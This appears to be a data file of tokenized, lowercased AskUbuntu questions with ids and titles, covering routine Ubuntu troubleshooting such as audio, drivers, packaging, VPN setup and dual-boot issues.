27019	strlen returns incorrect value when called in gdb	so i 'm noticing some severely incorrect behavior from calls to standard library functions inside gdb . i have the following program to illustrate : # include < stdio.h > # include < stdlib.h > # include < string.h > int main ( int argc , char *argv [ ] ) { char *s1 = `` test '' ; char *s2 = calloc ( strlen ( `` test '' ) +1 , sizeof ( char ) ) ; snprintf ( s2 , strlen ( `` test '' ) +1 , '' test '' ) ; printf ( `` string constant : % lu\n '' , strlen ( s1 ) ) ; printf ( `` allocated string : % lu\n '' , strlen ( s2 ) ) ; free ( s2 ) ; return 0 ; } when run from the command-line , this program outputs just what you 'd expect : string constant : 4 allocated string : 4 however , in gdb , i get the following , incorrect output from calls to strlen ( ) : ( gdb ) p strlen ( s1 ) $ 1 = -938856896 ( gdb ) p strlen ( s2 ) $ 2 = -938856896 i 'm pretty sure this is a problem with glibc shipped with ubuntu ( i 'm using 10.10 ) , but this is a serious problem for those of us who spend lots of time in gdb . is anyone else experiencing this kind of error ? what 's the best way to fix it ? build glibc from source ? ( i 'm already running a version of gdb built from source )
27021	setting microphone input volume using the command line ?	i have a usb mic i keep plugging into my laptop dock . when i drop into the dock i 'd like the mic setup as my current audio input automatically . i do have a `` i 'm docked '' script i run which sets xrandr/etc items , i 'd just need some method perform the action of : gnome-volume-control , input tab , choose mic but from the cmd line/script . any hints on how i can automate/script this ?
27023	multiple depends/recommends/ [ … ] in a control file ?	is it possible to have multiple lines for any type of field in a dpkg control file ? this is not about line continuation , but e.g . depends interspersed with recommends like so : depends : git , etckeeper , apt-file recommends : equivs depends : mplayer , pidgin , dlocate , pwsafe , ciso recommends : aria2 and so on . is this allowed , is it unspecified ( and some tool is going to cough on it ) or is it explicitly forbidden ? ( could n't find anything in debian-policy , either )
27024	running unity 2d - does not work on actual system but works fine in vm	so i 'm running ubuntu 10.10 and i can not get unity 2d to work with my system . this is particularly frustrating as it works just fine in all the vms i 've tested it on . i actually really like unity and i want to get to know it ( in part ) before ubuntu 11.04 . i checked synaptic and it looks like everything 's there . the only thing not installed are dev libs and so on . should i install those as well ? obviously the difference between my system and a vm is that the vm is running off a basically brand new os . i only use vms to test new stuff out and remake them often , so my only guess is that i have something installed on my system that is preventing unity from running . any thoughts ?
27031	what does the /apps/indicator-sound/volume_mute gconf key do ?	what does the /apps/indicator-sound/volume_mute gconf key do ?
27034	how to clean a hard drive before reinstall	have been using my drive since 6.04 often just updating , if i want to clean my drive and start again , which is best method to carry this out .
27035	how do i script an install ?	does anybody know of some documentation that would show me the best way to create a scripted install of ubuntu server ( 10.04 ) ?
27036	how to specify which keys capslock affects ?	using maverick , i am not able to get the capslock behaviour i want : i would like it to affect essentially the alphabetical , numerical , and punctuation keys , i.e . all the keys that print something ( as opposed to , say , the error keys ) , but only them . to illuminate this with an example : when writing code that uses % as the symbol for a comment , i want to be able to position the cursor at the start of a range of lines i want to comment out , then hit capslock , then iteratively hit the 5 key ( using qwertz , shift+5 gives % ) and the arrow down key , so that i can quickly place a % at the start of the lines . ubuntu in default configuration takes capslock literally , so that it affects only alphabetic keys . under preferences/keyboard/layout/options i can make it act as a pressed shift , but then the action of the arrow keys is to select text . all the other options available are equivalent to one of these two in my case . is it possible to somehow get this behaviour ? this is standard in windows . edit : @ mikel : i use english language with german keyboard layout . yes , by googling i found out about this belgian problem and the fix , but i hoped that there was an easier way , as i just want the windows behaviour . let 's see whether i get it to work .
27038	what are the changes between kernel in 10.04 and 10.10 ?	is there a place where i could check what are the differences between kernel in version 10.04 and 10.10 ? the reason is that from time to time i have total system freezes with 10.10 on dell inspiron 1501 which was no the case on 10.04 .
27042	what 's the ultimate way to install debug flash player in firefox ?	what 's the easiest way to get a debug flash player ( the one you can download from here , though i do n't care if it 's downloaded automatically ) working in firefox ? 64 bit system , default firefox from repository if possible , i do n't want the flash player to be replaced by a newer but non-debug version automatically ( updating to a new debug version is ok ) want the most recent version ( 10.2 at the moment )
27044	what 's going to change in the kernel in natty ?	does anyone know what changes are coming ?
27050	making file in user 's homedir accessible from web/webserver	i have a txt-file one of my user 's homedir which is regularly updated there by a script . i now want to be able to access ( read ) this file from the web . /home/user/folder/file.txt so what i tried now is to log in as root , go into my webservers httpdocs folder /var/www/path/to/domain/httpdocs and there i tried to create a symbolic link with ln -s /home/user/foler/file.txt /var/www/path/to/domain/httpdocs/file.txt but this did n't work ... i already tried changing the chmod of the symlink ( which changes the ones from the original file of course ) and also a chown to the user from webserver , but no matter what i tried i can not open the file from the web or from a php-script ( which is what i want to do ) can anybody help me and tell me what i need to do ? what rights do i need to give ? or is there another way of achieving this ?
27052	no audio after clean installation	i did a clean install of ubuntu 10.10 , and i have no audio . my windows partition has no problem with the audio card and an 10.04 32 bit version recognised the audio card after the install . this one apparently does too , but i do n't know what should i tweak . what should i look into ?
27061	install restricted drivers in command line	i 'm aware there 's already been a question and answer regarding nvidia drivers , but my case is a little different . my wireless adapter 's driver is proprietary , and for a minimal install , i need a command to install it . a general command for any other restricted driver that i may come across in the future would also be extremely helpful .
27063	how to hold a package back from being upgraded ?	i do n't want my kernel or grub updated until i do it manually . is this possible in ubuntu ( 10.04 , i suppose ) ?
27065	brand new battery is 100 % charged but at 0 % capacity	i just bought a brand new battery to replace one that had seemingly died . i followed the instructions that came with the battery and charged it overnight , then ran my computer on battery until it was in a critical state and charged it overnight again . now the battery appears to be 100 % charged and at the same time at 0 % capacity—when it 's plugged in it does n't charge and when it 's unplugged the computer immediately goes into low power mode . i 've taken the battery out and checked the contacts . i 've rebooted the system with and without the battery . nothing seems to help . i 'm not sure if i should blame the battery , the laptop , the charger , or the power management software for this state of affairs . the obvious answer would be the battery but i bought this battery because another year-old battery exhibited similar behavior—i assumed it was dead and a dell tech came to the same conclusion . i 'm loathe to order another new battery without first exploring other explanations . what can i do to diagnose this problem ? here 's the /proc info : $ cat /proc/acpi/battery/bat0/state present : yes capacity state : critical charging state : charged present rate : 1 ma remaining capacity : 0 mah present voltage : 9754 mv $ cat /proc/acpi/battery/bat0/info present : yes design capacity : 6600 mah last full capacity : 6789 mah battery technology : rechargeable design voltage : 11100 mv design capacity warning : 660 mah design capacity low : 200 mah cycle count : 0 capacity granularity 1 : 66 mah capacity granularity 2 : 66 mah model number : dell wk serial number : 4043 battery type : lion oem info : smp [ update ] it turned out to be the ac adapter . i find it very strange that a faulty adapter can cause the charging state to be `` charged '' on an empty battery . i 'll still up-vote answers that give good debugging strategies for this situation—swapping out the battery and adapter , in turn , is obvious but one does n't always have a spare battery or adapter around to play with . as noted below , dell was actually prepared to send a technician to my house to replace the motherboard , which would have been a phenomenal waste of time and money .
27069	youtube videos do not load completely	videos on youtube load for a few seconds and then it shows that it has completely loaded but not really . the video plays for some seconds and then stops and does n't load any more . what 's going on ?
27070	ruby compilation error in ubuntu 10	i 've got a vps which runs solusvm . i 'm now trying to install ruby 1.9.2 in it . i 'm following this guide : after i run this command : apt-get update apt-get -y install build-essential zlib1g zlib1g-dev libxml2 libxml2-dev libxslt-dev i got this error : root @ makserver : /usr/local/src/ruby-1.9.2-p0 # apt-get -f install reading package lists ... done building dependency tree ... done correcting dependencies ... done the following extra packages will be installed : libc6 suggested packages : glibc-doc the following packages will be upgraded : libc6 1 upgraded , 0 newly installed , 0 to remove and 80 not upgraded . need to get 0b/4252kb of archives . after this operation , 4096b disk space will be freed . do you want to continue [ y/n ] ? y debconf : apt-extracttemplates failed : bad file descriptor ( reading database ... 21594 files and directories currently installed . ) preparing to replace libc6 2.11.1-0ubuntu7.2 ( using ... /libc6_2.11.1-0ubuntu7.8_amd64.deb ) ... open2 : fork failed : can not allocate memory at /usr/share/perl5/debconf/confmodule.pm line 59 dpkg : error processing /var/cache/apt/archives/libc6_2.11.1-0ubuntu7.8_amd64.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 12 errors were encountered while processing : /var/cache/apt/archives/libc6_2.11.1-0ubuntu7.8_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) can anybody tell me how i can correct this ? thanks .
27073	is there a modern free-born file system working equally good in ubuntu and windows ?	is there a modern ( i mean excluding ext2/3 as they are obsolete for general usage when there is ext4 today ) free-born ( i mean excluding fat and ntfs ) file system working equally good in ubuntu and windows ( maybe after installing some extra drivers ) ( or any active project of such ) ?
27074	can i share same bookmarks db among firefox installations in ubuntu and windows ?	i 've got a dual-boot system , having windowsxp-ntfs and ubuntu-ext4 partitions . it would be cool if i could use the same bookmarks database in firefox under linux and windows . how to achieve this ? what files should i link and is this expected to work any stable ? please no web service-based solutions . i have had this idea but prefer my browser data to be stored locally .
27075	can i share mysql database files with windows on dual boot ?	i 'd like to use in both ubuntu and windows ( dual boot ) my mysql database files residing on a ntfs partition . will it work ? any gotchas ?
27080	where do i file bugs for the ubuntu one music client for android ?	i 've recently started using the ubuntu one music streaming client for android . from the web page it says that the android app is based on subsonic . i want to file bugs on the app , mostly feature requests and things like that , and from looking at the screenshots , the application seems to be subsonic preconfigured to use my u1 music collection . is it appropriate for me to file feature requests with subsonic , or is there a launchpad project where we 're supposed to file bugs which are then vetted and sent upstream ?
27081	what is better to install 10.04.2 or 10.10 or debian 6.0.0 ?	i want to install something debian-based , now i have pre-installed sled 11 sp1 , laptop hp 4520s .
27088	tomboy wo n't start	i 've just discovered tomboy and like it . i added it to the startup applications , and on next boot tomboy wo n't start . it then also wo n't start when i select it manually from the menu . i unchecked its entry in the startup applications and rebooted , but it still wo n't start . i uninstalled it and installed it again in order to perhaps fix some broken file or setting , but it did n't help . i saw this question and added the applet . but the applet says `` tomboy notes '' has quit unexpectedly and a reload does n't work ; the message appears again . starting it from terminal gives this error report . when i enter ls the note file , i get -rw-r -- r -- 1 torben torben 0 2011-02-17 09:09 /home/torben/.local/share/tomboy/f3370271-6210-4b78-8b4a-c31cc2af6935.note how can i fix what 's wrong ?
27093	good floor planner program ?	i 'm planning to have a house built . i want to draw up some sketches on the computer , so i am looking for a program that can help me do this . it does n't have to be a professional architecture tool ; in fact that would be too complicated just yet ( but maybe later on , for the detailed work ... ? ) . a simpler tool would be better . features should include such things as ability to draw and move walls ( not just using simple boxes ) , calculate room/floor area , add windows and doors , and the like . that 's why inkscape or ooo presentation wo n't do . on windows , a friend would just download a cracked professional architecture tool but that is not what i want to do . suggestions ?
27097	how to print a regular file to pdf from command line	in gedit , printing a file gives an option of printing to file where the file can be saved as a pdf . how can i do the same thing from the command line ?
27098	close/minimize/restore buttons not present	i was playing around with compiz and now the close/minimize/restore buttons are gone . please help me to fix this .
27099	asus eee pc 701 4g hangs on boot	i 've got an old eee pc 701 4g with the following specifications : 512 mb ram 4gb ssd drive sm223ac 8gb sd card extension screen resolution : 800 x 480 bios revision 1101 ( 05/16/2008 ) ec firmware version : epc-079 windows xp sp3 works fine on it , but i decided to switch my os to ubuntu . i have downloaded an ubuntu 10.10 netbook remix iso and wrote it to my fat32 sd card using universal-usb-installer-1.8.3.3 , as described on ubuntu.com during standard load from the sd card the boot process hangs up with black screen . if i 'll press f6 while preloading ubuntu , it sucessfully displays the boot menu , selecting language and showing 2 main commands : `` run ubuntu from usb drive '' and `` install ubuntu '' . selecting either of these commands leading to the same result - after some background work the main loading indicator is displayed ( `` ubuntu '' text with dotted progress bar under it ) , and it 's progressing forever without any effect . is ubuntu 10.10 compatible with my eee pc at all ? how to boot it correctly ?
27101	how to distribute applications ?	i am new to ubuntu development . as a learning experience , i have written a custom chat application using qt4 and i want to deploy it in some sort of setup file . whats the easiest way of deploying an application viz a viz setting desktop icons . automatically requesting for administrator privileges to execute . inserting an entry into the startup menu . automatically compress my application and reduce download size . automatic startup for my application without user intervention i am familiar with using nsis scripts on windows , but i do n't know where to begin on ubuntu . i would preffer a solution similar to nsis scripts .
27106	vim : move left at the beginning of a line should go to above line	in usual text editors , when you move your cursor left at the beginning of a line , the cursor goes up at the end of the above line . is it possible to get this behavior in vim ?
27113	why do i get the error message `` fcinit fatal vloopback not found '' whenever i boot ?	i get this message whenever i boot . it has something to do with the fontconfig/cache . any ideas how to resolve it ?
27114	how to apply a changelog file to packages in a ppa when building from recipe ?	when my package gets build by launchpad using a recipe , it ignores the ./debian/changelog file i provide , and it generates a useless one like following : harmonyseq ( 0.14~natty1 ) maverick ; urgency=low * auto build . -- rafal cieslak < rafalcieslak256 @ gmail.com > tue , 25 jan 2011 16:56:57 +0000 it would be much better if launchpad stored the list of changes i prepared in the changelog file , rather than just putting `` auto build '' there . how do i force launchpad to use the list of changes from my changelog file , when building packages from a recipe ?
27115	terminal command to backup thunderbird address book ?	is there a terminal-command that backups thunderbird 's addressbook ? i would like to set up a cron-entry for that . note that i only want to back up the address book , not my entire profile .
27117	why is n't a license shown when installing ( and when installing most software ) ?	as a former windows user i was used to accepting eula 's and other licenses when installing any piece of software , or when installing the whole os . on ubuntu it happens extremely rarely ( i 've met it only once ) . is it correct ? ubuntu and most of it 's software is under some free-to-use-and-modify license like gnu gpl or something similar , but should n't the license be presented to the user ?
27124	why do n't i have to accept a eula when installing adobe flash player ?	the adobe flash player has a quite restrictive eula but it is not presented to the user when he installs it . is n't the user obliged to accept it , before using it ? maybe some users would refuse using it , if they knew the rules they accept by installing the flash player ? ( i think same problem applies to many software from partner repository , restricted drivers and proprietary or non-free software . )
27126	how to set the maximum pages per job not user or printer ?	i like to set up the maximum pages that any user can give in any single job . so that if some one by mistake send a huge print of 100 pages his job should be discarded . the normal job-limit option using lpadmin only limits the jobs for a period in seconds or for the printer . need help
27127	how to enable desktop effects in vmware ?	i am using vmware workstation 7 . i have the vmware tools and 3d acceleration enabled but when i try to enable desktop effects i get the message `` desktop effects could not be enabled '' . i have an nvidia geforce graphic card . and mine is a dell xps l501x .
27129	why do back in time snapshots appear to be so large ?	i just backed up the contents of my home partition onto my external hard drive using back in time . i browsed to the backed up contents in the external drive and under properties it showed me the size as 9.6 gb . as i read that in next snapshots i create , back in time does not backup everything but creates hard links for older contents and saves newer contents , i wanted to test it . so i copied two small files into my home partition and ran 'take snapshot ' again . the operation completed within a minute - first it checked previous snapshot , assessed the changes , detected two new files and synced them . after this when i browsed to the backed up contents , i was surprised to see the newer and older backup taking up 9.6 gb each . is n't this a waste of hard drive space ? or did i interpret something wrongly ?
27131	usb detection in vmware	i have ubuntu 10.10 installed on vmware workstation 7. how do i get the virtual machine to detect usb drives / cd dvd drives ?
27134	disable autostart for a service without uninstalling ?	how can i disable autostart for a service without uninstalling ? for example , i 'd like to leave tomcat installed , but i do n't want it turning on every time i restart .
27136	kubuntu login problem	i have a problem when trying to login to my kubuntu 10.10 . the login screen shows up , then i type my password , a blank screen is shown with my desktop background picture and then throws me back on the login screen . if i choose to login from console , i can do that , and by typing startx i can log in just fine but in the end i can not shutdown the computer from the k menu nor will my settings remembered for the next time i log back . i have my home directory mounted from a different partition but i tried to create a new user account and i could log in without any kind of problem . the home directory is not encrypted , at least not to my knowledge . some log files : xorg.0.log dmesg.out kdm.log xsession.errors
27141	`` gnutls error : a tls packet with unexpected length was received '' when i connect my iphone 3g	look at the video ; the iphone is supposed to appear as a photo collection of some sort but nothing happens with my iphone ! i have installed and upgraded all of the libimobiledevice versions . i have tried to mount the iphone with ifuse /mnt/iphone/ but the result of that operation is : gnutls error : a tls packet with unexpected length was received . hi , how do i connect my iphone to my laptop ( ubuntu 10.04 ) so that i can sync music and be able to look at it as a usb stick ? ( this is what i am expecting to happen . ) when i connect it to my laptop , nothing happens - it does n't show up as an icon or as a mass storage device . my iphone runs ios v4.2.1 and it 's an iphone 3g . it 's not jailbroken for the moment ; would that be a problem ? my laptop is an asus 1201n with ubuntu 10.04 ( 64-bit ) . bus 002 device 005 : id 05ac:1292 apple , inc. iphone 3g i connected my ipod video ( 30 gb ) and that one does n't appear as well so i 'm kind of stuck now . the problem probably lies in the system , because the usb port is working . bus 002 device 006 : id 05ac:1209 apple , inc. ipod video i have added this ppa , i have done all of the sudo update and upgrade . but my computer does n't realize that my iphone is connected , whish is n't related to libimobiledevice . the port is working fine , it 's simply that my computer does n't recognize that i have my iphone plugged-in ! the phone itself is working ( i tested it on my mac ) . i have the latest versions of these programs : hipo , ipod , gtkpod , ifuse , libusmuxd1 and usbmxd . i connected my iphone in windows 7 and it worked , albeit annoyingly . i tried to mount my iphone with fuse but i got this error : alvar @ alvars-laptop : ~ $ ifuse /mnt/iphone/ error : the mount point specified does not exist i have tried the ubuntugeek link , but i got an error while mounting it . gnutls error : a tls packet with unexpected length was received . which one ? ( i have lucid not maverick . )
27142	change color of window buttons	is it possible to change the window button color of the close , minimise and maximise buttons of the ambience theme from orange to an user defined color ? i tried to find anything relavant in the gtkrc , but failed .
27146	skype prevents login because it believes another instance of skype is already running	skype 2.1 has been working in ubuntu 10.10 but now stops me from logging in - it says there maybe another instance of skype running . there is not , so i ca n't use skype . i have changed passwords several times but this has n't rectified the problem . please can someone help ?
27148	compile 32bit kernel on 64bit machine	i 'm trying to compile a kernel for a 32bit single-core intel atom machine . needless to say , the compile is taking inordinate amounts of time . it 's been going for 2 hours and it 's still only halfway through the driver modules . compiling a kernel on my main desktop only takes 15 minutes but it 's a 64bit machine . can i cross compile to generate a 32bit kernel package from the better machine ?
27155	installing ubuntu before or after upgrading from vista to win 7 ?	i just got a new ssd hard drive for my thinkpad laptop . i just installed vista with the factory cds . on my old os , my main os was ubuntu but i do want to keep windows on a separate partition as a dual booth system . i definitely want to upgrade to win 7 though and i will get it in a few days . my question is : should i install ubuntu now and then upgrade to win 7 in a few days ? or is that going to mess up with the grub ( or something else ) ? if that is the case , then i 'd rather wait to install ubuntu until after i upgrade to vista . p.s . i know that probably any kind of mess done by the win upgrade could be fixed , but i just want to avoid wasting time .
27157	where does ubuntu store install files ?	when i download a package from synaptic , where does ubuntu store the install files , if at all ? bandwidth is limited in my country , and i would like to download programs only once and back them up for future use .
27162	is there a way to use a ssh connection to access smb or upnp files without setting up a vpn ?	what i 'm trying to do is set up a ssh key that only gives access to certain directories , for security reasons i do n't want it to have full access to my ssh server . i already have the ability to access the directories i need over my local network ( right now using smb , although i also used upnp for awhile ) . i need , however , to be able to access those files securely over the internet from both ubuntu and windows machines . i 'm somewhat new to ssh and not sure what the best approach to solving my problem is . if anyone knows how i can do this or where i can find a detailed tutorial i 'd be grateful . and as always if anything is confusing or if there are any comments or corrections please let me know .
27164	installing a minimal gui + vnc	i have a fresh install of ubuntu 10.04 server on my vps and would like to install a minimal gui onto this and allow vnc access to . please could someone outline the steps required to set this up so that i can vnc to my machine under a newly created user account . create the user : useradd -m -s /bin/bash -p password -d /home/usera usera chown usera : users /home/usera install the gui sudo apt-get install -- no-install-recommends ubuntu-desktop setup vnc ?
27165	how can i get my canon pixma mx 310 printer working ?	how can i get my canon pixma mx 310 printer to work with ubuntu ?
27168	config import on network-manager-openvpn	i 'm trying to use a free service using the openvpn protocol using openvpn 's gui module in the network manager . the config worked perfectly well as .ovpn on windows . the behavior in windows is such that i ran openvpn gui and chose to connect to this particular vpn . it would then show the activity in the attempt to connect and opens a dialog box for username/password authentication . i 've successfully imported all the configurations by changing the file type to .conf and using the import feature in network manager . however , attempting to connect would simply display the network manager 's attempting to connect animation , but ultimately end with a notification of connection timing out . no prompt asking for authentication would appear at all , nor can i find any feature to prefix the authentication details . client dev tun proto tcp remote miami.proxpn.com 443 resolv-retry infinite nobind persist-key persist-tun ca ca.crt cert client.crt key client.key cipher bf-cbc keysize 512 comp-lzo verb 4 mute 5 tun-mtu 1500 mssfix 1450 auth-user-pass reneg-sec 0 # if you are connecting through an # http proxy to reach the actual openvpn # server , put the proxy server/ip and # port number here . see the man page # if your proxy server requires # authentication . ; http-proxy-retry # retry on connection failures ; http-proxy [ proxy server ] [ proxy port # ] needless to say , but i 've downloaded all the required packages for setting up openvpn connections . by the way , as you can see above , .key and .crt files location are specified to be in the same directory as the config file . after importing the config file , if i were to remove them , would it cause any problem ? note , i have n't removed them , so the problem i 'm facing is not due to the absence of these files .
27170	technique to display multiple browser windows tiled at same time ?	i have a separate monitor that i use for toodledo ( a web-based task managment app ) , in which i like to display various views ( next action status , waiting status , planning status , and overdue due-date items ) . i 've been playing around with some add-ons on firefox that allow you to split the browser , but they are cumbersome . i 'm now trying chrome , and opening 4 different browser windows that i 've tiled on the screen in quadrants ( i use the compiz grid applet for this ) . this is not ideal as each browser replicates the url bar and the tab , and i do n't have opening ths windows automated upon restart . chrome is great in managing screen real estate , but this is not ideal . in firefox i tried various extension to hide interface elements , but it was very clunky ... am wondering whether anyyone has tried to do similar with td , and how they achieved what i 'm going after ? am wondering whether someone has a good technique for accomplishing what i 'm looking for ?
27171	hdmi sound gone , ca n't figure out how to turn it back on	i have had an acer revo box as a media centre for a while . i recently installed ubuntu server ( 10.10 ) on it and polished it up with nodm ( one of the most simple ways to launch an x session ) and installed boxee . it 's been working fine for over a month . it 's just running alsa . i 've had problems with pulseaudio/boxee/hdmi before so i wanted to keep it simple . and that worked . it pushed both pcm and digital ( aac and various dolby codecs ) over hdmi perfectly . but i restarted it the other day after mucking around with some nfs configuration and now there is n't any sound . the hardware is an ion chipset . nvidia 9400m graphics with nvidia mcp79/7a audio . one thing i have noticed is there does n't appear to be any sign of a iec958 device . a traditional fix in the past for fresh installs has been to load alsamixer , find the iec device and toggle its mute but i ca n't . i 'm certain this used to represent the hdmi output . it just does n't seem to exist any more unless i run sudo alsa-utils restart while boxee is running , when i see it in an error message : * shutting down alsa ... [ ok ] * setting up alsa ... * warning : 'alsactl restore ' failed with error message 'alsactl : set_control:1388 : can not write control '2:0:0 : iec958 playback default:0 ' : operation not permitted ' ... ... done . when nodm ( and thus boxee ) are n't running , i do n't see this error but alsamixer still does n't show the iec channel . aplay -l gives : card 0 : nvidia [ hda nvidia ] , device 0 : alc662 rev1 analog [ alc662 rev1 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : nvidia [ hda nvidia ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 0/1 subdevice # 0 : subdevice # 0 its section in lshw reads : *-multimedia description : audio device product : mcp79 high definition audio vendor : nvidia corporation physical id : 8 bus info : pci @ 0000:00:08.0 version : b1 width : 32 bits clock : 66mhz capabilities : pm bus_master cap_list configuration : driver=hda intel latency=0 maxlatency=5 mingnt=2 resources : irq:22 memory : fae78000-fae7bfff i was running on the stock pae kernel but now it 's running on 2.6.37.1 . i upgraded to see if that fixed things ; it did n't . i 'm considering a reinstall but i hate doing that because a ) there 's a bit of custom configuration in getting x and boxee to start on boot and b ) i do n't know what the problem is . if i reinstall this time , i 'll end up doing that every time the sound breaks . i love ubuntu but i do n't want to install it once a month . is there any way to forcibly reset all alsa settings and restart from scratch ( without doing a reinstall ) ? any other tips ? if you need more information , just ask . debug information : http : //www.alsa-project.org/db/ ? f=e615af490271aa6c67cfdba23d14c757012aecd9
27172	can not install ubuntu 11.04 on ibm t43	i downloaded the iso file and burn the images onto the usb and cd . tried to install from usb then cd , neither works . the installation will bring up the ubuntu screen and `` try '' and `` install '' option . after choosing either one then the screen went black and stay that way for a long time with no prompt or anything . eventually , i turned off the computer . no install . can anyone help ? thanks .
27176	how does the trash can work , and where can i find official documentation , reference , or specification for it ?	when trying to manage trash can from mounted ntfs volumes , i ended up reading freedesktop.org 's reference on it . poking around and doing some tests , i realized ubuntu/gnome does not follow the specs 100 % . here 's why : for non-/ partitions , it always uses < driveroot > /.trash- < uid > , it never used < driveroot > /.trash/ < uid > , even when i created it in advance . while this works , it 's annoying : if i have 15 users , i end up with 15 /.trash-xxx folders in my drive , while the other approach would still give a single folder ( with 15 sub-folders ) . that `` pollution '' in my drives is very unpleasant . and specs say `` if an $ topdir/.trash directory is absent , an $ topdir/.trash- $ uid directory is to be used '' . well , it is present , so why does it never use it ? root trash does not work , at least not out of the box . open nautilus as root and click on trash ; it gives an error . try to delete any file , it says `` it ca n't move to trash '' . ok , i know this can be fixed by creating /root/.local/share . but specs says `` a âhome trashâ directory should be automatically created for any new user . if this directory is needed for a trashing operation but does not exist , the implementation should automatically create it , without any warnings or delays. '' . why the error then ? bug ? why must i change /etc/fstab entries for mounted volumes , adding options like uid and guid , if the volumes are already mounted as rw for everyone ? these are just some examples of deviation from the standard . so , the question is : '' if ubuntu does not adhere 100 % to the spec , how exactly does the trash work ? where can i find a technical reference for ubuntu 's implementation of the trash ? '' by the way : if ubuntu does happen to follow specs , please tell me what i am doing wrong , especially regarding the /.trash- < uid > vs /.trash/ < uid > issue . thanks ! edit : some more info : if a given fs has no support for the sticky bit ( vfat , ntfs ) , it probably does n't have for permissions either ( at least vfat surely does n't ) . so what prevents one user from purging / restoring other users ' ./trash-xxx ? if one can read/write his own trash , one can do the same for the whole drive , including other 's trashes , correct ? or does gnome have some kind of `` extra '' protection on ./trash-xxx folders on vfat/ntfs fs ? if linux can `` emulate '' file permissions on ntfs mounting by editing /fstab uid and gid options , can it also `` emulate '' the sticky bit ? i would really prefer to use /.trash/xxx format ... for the root issue : for the / partition , i can use trash as root , and it goes to /root/.local/share/trash . but if i click on nautilus `` trash '' ( as root ) , i get an error . do n't you ? so files are correctly trashed , but i ca n't access it . all i can do is manually `` purge '' them ( by deleting files on /root/.local/share/trash ) , but restoring would be very tricky ( opening info files and manually moving , etc. ) . for non-/ partitions ( or at least for vfat/ntfs ) , i can not even use trash as root : it does not create a ./trash-0 folder , it simply says `` can not trash , want to permanently delete ? '' why ? about fstab : i use it for a permanent mount for my ntfs partitions . i have several , and if not `` pre-mounted '' they really clutter the desktop and/or nautilus . i 'd rather have it pre-mounted , integrated in my file system , in mounts like /data , /windows/xp , /windows/vista , and so on , and leave /media and its `` mount/unmount '' flexibility just for truly removable drives . so , if ubuntu/gnome truly follows the spec , is there any way to fix the root issues and to `` emulate '' the sticky bit for ( at least ) my fstab'ed ntfs fixed partitions ?
27178	i would like to set 127.0.0.1 in my resolv.conf	i was hoping to set my local host in my resolv.conf to hermes . so in affect if i type in hermes:8080 into the browser , i get the localhost:8080 how is this accomplished ? please and thank you .
27182	installation issue on hp omni 200xt : no video	i recently purchased an hp omni 200xt with integrated intel graphics . i attempted to use the ubuntu live cd , but could n't get it to display anything ( only the first screen with the little keyboard and `` equals '' logo ) . i tried the alternate cd and the installation appeared to go through without a hitch . but now when i boot , i again do n't get any video . though i can hear the `` login '' sound a few seconds after booting , the screen is black . i 'm not sure how to proceed ... any suggestions ? followed instructions here and added nomodeset to grub configuration . when i add the nomodeset flag , i can actually see the ubuntu splash loading screen . then a text error flashes across the screen and i get dumped to a terminal . running `` startx '' i get the following errors : ( ee ) open /dev/fb0 : no such file or directory ( ee ) intel ( 0 ) : no kernel modesetting driver detected . ( ee ) screen ( s ) found , but none have a useable configuration . fatal server error : no screens found
27187	is there an up-to-date gnome-shell ppa ?	is there an up to date ppa of gnome-shell ? i have a number of issues building it , and i 'd prefer not to use an old version .
27189	is there a global menu for the xfce panel ?	it would be very useful , and am thinking of switching to xfce for the speed .
27190	dbus signal for volume up & down	i recently upgrade to ubuntu 10.10 maverick meerkat and to my dismay , the mediakeys `` volume up '' and `` volume down '' do not send dbus signals anymore ... how can i add these back ? thanks ! ! update : it seems that under some circumstances ( which i do n't know exactly yet ) , the dbus signals start working again . it is as though when a certain application ( tbd ) is executed , the dbus signals are re-activated .
27192	monitor resolution wont change	i recently upgraded to ubuntu 10.10 , and installed the proprietary drivers for the ati video card.now when i go to change monitor from mirror to individual or change the resolution it asks for me to log out and log back in , now when i do that it just reverts back to the same resolution and same mirrored preference which i do n't want.is there a way i can change it and keep it changed ?
27198	lock-keys-applet alternative for kubuntu	is there any lock-keys-applet alternative to kubuntu . i just want some indication whenever i use caps lock or num lock key . i am using dell inspiron n5010 laptop and it does not have inbuilt indicator . thanks
27200	can i use my virtualbox 3 . * vms with virtualbox 4.0 ? if so , how come the repository does n't have it ?	i had the following repository for virtualbox in my /etc/apt/sources.list : deb ttp : //download.virtualbox.org/virtualbox/debian maverick non-free then i found out there was a new version when i opened it today ( the program prompted me with a window to manually download it from oracle 's site ) . then i tried sudo apt-get update & & sudo apt-get upgrade and got nothing . here you have a way to add virtualbox-4.0 to your apt-get , but the problem is that it is n't updating , meaning i would have the two installed . i 'm also worried if i 'll have to do something like that each time it updates since that would defeat the point of apt-get . i 've been using virtualbox with the apt-get update for more than a year now and this is the first time it has happened , so i was wondering if there would be a way to just update my current installation .
27203	how to get native notifications with firefox 4 ?	i recently upgraded to firefox 4 . there is extension in synaptic - xul-notify that can be used in firefox 3.x to get native notifications through notify-osd but it is not working with firefox 4 . is there a similar separate extension for firefox 4 or some other workaround to get native notifications ?
27213	what is the equivalent to the windows `` program files '' folder ? ( where do things go when i install them ? )	what is the ubuntu equivalent to the windows c : \program files folder ? this is where windows stores the system wide data for applications .
27224	what are some âmust haveâ ubuntu programs ?	what essential software do you have on a ubuntu desktop machine ? one per answer please , and if you can , provide the official site link if they have it . before adding an another answer , please search for it first and upvote the existing answer rather than adding it again . to search , use the search box in the upper-right corner . to search the answers of the current question , use inquestion : this . for example : inquestion : this `` 7-zip '' p.s inspired by this question . i think the question was very useful for windows users . i do n't mind if the moderators change this question to community wiki .
27228	recommendation for a guitar tuner	i tried searching for a guitar tuner for ubuntu ( something similar to pitchperfect tuner for windows ) and installed lingot but could n't get it to work . which guitar tuner do you guys suggest ? i hope this is n't the wrong place for this question ! !
27242	how to share an usb device ( scanner ) over network ( from windows to ubuntu ) ?	i have a special thing : i want to share my scanner over the network . the scanner is connected to a windows 7 machine , but i want to use it from ubuntu 10.04 ... i found some methods : usb over network - it can handle linux > windows ; and windows > windows it has windows ( and windows ce ) & linux server , but it has only windows client , their linux client is coming soon - that's a drag : ( - it is not free , but what uses windows , what is free ? usbip - to linux > linux , it is free , and nice i 'm looking for the other way , what can handle windows > linux thing ... i prefer free things , but that thing is maybe not free ...
